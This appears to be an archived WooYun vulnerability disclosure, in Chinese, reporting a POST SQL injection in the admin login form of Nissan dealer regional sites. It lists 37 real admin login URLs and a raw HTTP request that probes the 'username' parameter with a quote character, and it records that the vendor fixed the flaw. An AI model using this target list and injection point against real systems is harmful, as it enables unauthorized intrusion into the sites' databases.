乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-28: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-14: 厂商已经修复漏洞并主动公开,细节向公众公开
……
后台登录框POST注入,共37个分钟使用该系统。
http://beijing.zznissan.com.cn/admin/console/?c=login&a=loghttp://anhui.zznissan.com.cn/admin/console/?c=login&a=loghttp://chongqing.zznissan.com.cn/admin/console/?c=login&a=loghttp://civilian.zznissan.com.cn/admin/console/?c=login&a=loghttp://e.zznissan.com.cn/admin/console/?c=login&a=loghttp://fujian.zznissan.com.cn/admin/console/?c=login&a=loghttp://gansu.zznissan.com.cn/admin/console/?c=login&a=loghttp://guangdong.zznissan.com.cn/admin/console/?c=login&a=loghttp://guangxi.zznissan.com.cn/admin/console/?c=login&a=loghttp://guangzhou.zznissan.com.cn/admin/console/?c=login&a=loghttp://guizhou.zznissan.com.cn/admin/console/?c=login&a=loghttp://hainan.zznissan.com.cn/admin/console/?c=login&a=loghttp://hebei.zznissan.com.cn/admin/console/?c=login&a=loghttp://heilongjiang.zznissan.com.cn/admin/console/?c=login&a=loghttp://henan.zznissan.com.cn/admin/console/?c=login&a=loghttp://hubei.zznissan.com.cn/admin/console/?c=login&a=loghttp://hunan.zznissan.com.cn/admin/console/?c=login&a=loghttp://jiangsu.zznissan.com.cn/admin/console/?c=login&a=loghttp://jiangxi.zznissan.com.cn/admin/console/?c=login&a=loghttp://jilin.zznissan.com.cn/admin/console/?c=login&a=loghttp://liaoning.zznissan.com.cn/admin/console/?c=login&a=loghttp://neimenggu.zznissan.com.cn/admin/console/?c=login&a=loghttp://ningxia.zznissan.com.cn/admin/console/?c=login&a=loghttp://nv200.zznissan.com.cn/admin/console/?c=login&a=loghttp://patrol.zznissan.com.cn/admin/console/?c=login&a=loghttp://qinghai.zznissan.com.cn/admin/console/?c=login&a=loghttp://shandong.zznissan.com.cn/admin/console/?c=login&a=loghttp://shanghai.zznissan.com.cn/admin/console/?c=login&a=loghttp://shanxi.zznissan.com.cn/admin/console/?c=login&a=loghttp://sichuan.zznissan.com.cn/admin/console/?c=login&a=loghttp://spv.zznissan.com.cn/admin/console/?c=login&a=loghttp://sx.zznissan.com.cn/admin/console/?c=login&a=loghttp://tianjin.zznissan.com.cn/admin/console/?c=login&a=loghttp://zhejiang.zznissan.com.cn/admin/console/?c=login&a=loghttp://yunnan.zznissan.com.cn/admin/console/?c=login&a=loghttp://xizang.zznissan.com.cn/admin/console/?c=login&a=loghttp://xinjiang.zznissan.com.cn/admin/console/?c=login&a=log
POST数据:
POST /admin/console/?c=login HTTP/1.1Host: fujian.zznissan.com.cnContent-Length: 75Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://fujian.zznissan.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://fujian.zznissan.com.cn/admin/console/?c=login&a=logAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: XYRE_SID=a6c39677a50f5f66aff40c1f9b418252f1dcab57; PHPSESSID=6fdrf9jc327vdev1r63uid85i7username=%27&password=&captcha=cjfa&imageField.x=64&imageField.y=19&a=login
注入参数:username
如上
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-12-31 14:03
已确认,谢谢!
2016-01-14:在洞主的帮助下,修改源代码,已修复此漏洞。对洞主再次致谢!